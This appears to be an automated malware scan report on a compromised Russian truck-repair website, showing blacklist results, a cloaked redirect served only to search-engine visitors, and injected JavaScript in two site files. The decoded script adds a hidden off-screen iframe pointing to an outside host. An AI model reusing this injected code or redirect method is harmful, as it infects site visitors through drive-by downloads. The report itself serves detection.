Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gruzosto.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gruzosto.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
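Malicious/Suspicious Redirects
Note: the requests below carry a search-engine Referer header. The same URL http://gruzosto.ru/ is listed under "Scanned pages/files" with 200 OK, which suggests the redirect is served conditionally, so a check without that Referer may not reproduce it.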
Request | Server response | Status |
URL: http://gruzosto.ru/ (request imitating a visitor arriving from a search engine; see the Referer header) GET / HTTP/1.1 Host: gruzosto.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 18:17:26 GMT Location: http://t87e.gu.ma/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | malicious |
URL: http://t87e.gu.ma/ (request imitating a visitor arriving from a search engine; see the Referer header) GET / HTTP/1.1 Host: t87e.gu.ma Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Found Connection: close Date: Thu, 25 Sep 2014 18:14:10 GMT Location: http://weras.isasecret.com Server: Apache/2.2.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | malicious |
Scanned pages/files
Request | Server response | Status |
http://gruzosto.ru/ | 200 OK Content-Length: 47410 Content-Type: text/html | clean |
http://gruzosto.ru/media/system/js/core.js | 200 OK Content-Length: 6146 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 90461 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/caption.js | 200 OK Content-Length: 2721 Content-Type: text/javascript | clean |
http://gruzosto.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240049 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox [… excerpt cut off here in the report …]
Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^￥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
| ||
http://gruzosto.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 6085 Content-Type: text/javascript | clean |
http://gruzosto.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 2950 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox [… excerpt cut off here in the report …]
Decoded script:
window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}}); window.addEvent('domready',function(){var toplink=document.id('topofpage');if(toplink){var b=new Fx.Scroll(window);toplink.addEvent('click',function(e){new Event(e).stop();b.toTop()})}}); <iframe src="http://ehehtafeg.netishyn.org/jtrjffHDAJJF7.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe>
Antivirus reports:
| ||
http://gruzosto.ru/modules/mod_slideshow_pro_sp2/assets/js/script.js | 200 OK Content-Length: 8509 Content-Type: text/javascript | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-dvigatelya.html | 200 OK Content-Length: 25535 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-hodovoi-chasti.html | 200 OK Content-Length: 26587 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-tormoznoj-sistemy.html | 200 OK Content-Length: 26139 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-korobki-peredach.html | 200 OK Content-Length: 27603 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-rulevogo-upravleniya.html | 200 OK Content-Length: 24487 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-vedushchego-mosta.html | 200 OK Content-Length: 21402 Content-Type: text/html | clean |
http://gruzosto.ru/2012-02-02-11-46-50/remont-stsepleniya.html | 200 OK Content-Length: 25064 Content-Type: text/html | clean |